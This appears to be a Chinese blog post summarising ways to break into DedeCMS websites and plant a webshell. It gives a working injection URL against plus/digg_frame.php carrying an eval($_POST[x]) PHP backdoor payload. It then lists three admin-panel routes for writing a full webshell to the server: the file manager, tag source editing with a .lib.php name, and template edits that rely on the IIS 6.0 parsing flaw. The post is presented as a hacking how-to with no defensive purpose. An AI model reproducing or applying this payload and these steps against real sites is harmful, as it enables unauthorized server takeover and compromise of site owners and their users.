天天看點

dedecms入侵拿webshell之方法總結

1、注入漏洞

存在注入位址:在域名下輸入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

dedecms入侵拿webshell之方法總結

http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

注入成功,産生了注入檔案。

http://localhost:802/data/mysql_error_trace.php

一句話木馬連接配接上傳大馬即可!

注入漏洞詳解見

2、背景拿webshell

第一種方法,利用檔案管理直接建立php大馬```

dedecms入侵拿webshell之方法總結

背景--核心--附件管理--檔案式管理器 建立檔案,寫入大馬檔案直接通路。

dedecms入侵拿webshell之方法總結

如果沒有安裝檔案管理器,可以檢視下插件目錄有沒有此插件檔案。

背景--子產品--子產品管理--檔案管理器 點選安裝,然後在建立php大馬```

dedecms入侵拿webshell之方法總結

如果沒有安裝插件,并删除了插件目錄就無法使用此方法。

第二種方法:利用标簽源碼管理

背景--模闆--标簽源碼管理,随便選擇一個标簽 點編輯。檔案名稱輸入:格式為。xxx.lib.php,内容輸入大馬檔案即可。

dedecms入侵拿webshell之方法總結
dedecms入侵拿webshell之方法總結

第三種方法、利用模闆修改。

此方法利用IIS解析漏洞,前提網站必須在IIS6.0運作。

dedecms入侵拿webshell之方法總結